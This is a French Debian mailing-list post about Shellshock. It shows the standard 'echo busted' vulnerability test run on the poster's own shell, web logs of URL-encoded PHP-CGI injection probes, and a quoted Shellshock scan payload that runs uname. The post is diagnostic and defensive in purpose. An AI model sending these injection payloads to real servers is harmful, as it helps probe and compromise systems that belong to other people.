Zut !
~# env X="() { :;} ; echo busted" /bin/sh -c "echo completed"
busted
completed
~# env X="() { :;} ; echo busted" `which bash` -c "echo completed"
busted
completed
Par contre dans mes logs, je n'ai que des trucs comme ça :
142.4.195.183 - - [26/Sep/2014:00:59:39 +0200] "POST /cgi-bin/php/%63%
67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%73%
75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%65+
%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F
%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+%2D%
6E HTTP/1.1" 403 168 "-" "-"
46.165.221.166 - - [26/Sep/2014:00:59:40 +0200] "POST /cgi-bin/php/%
63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D%64+%6D%6F%64+%2D%64+%
73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73%3D%22%22+%2D%64+%64%6E%
65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+%63%67%69%2E%66%6F%72%63%
65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%74%5F%3D%30+%2D%64+%75%74+
%2D%6E HTTP/1.1" 403 168 "-" "-"
Le 26 sept. 14 à 22:52, admini a écrit :
pendant ce temps ca scanne sévère: () { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a je vois ça sur mon site de production. -- Lisez la FAQ de la liste avant de poser une question : http://wiki.debian.org/fr/FrenchListsPour vous DESABONNER, envoyez un message avec comme objet "unsubscribe"vers debian-user-french-REQUEST@lists.debian.org En cas de soucis, contactez EN ANGLAIS listmaster@lists.debian.org Archive: [🔎] 5425D216.1050808@freeatome.com">https://lists.debian.org/[🔎] 5425D216.1050808@freeatome.com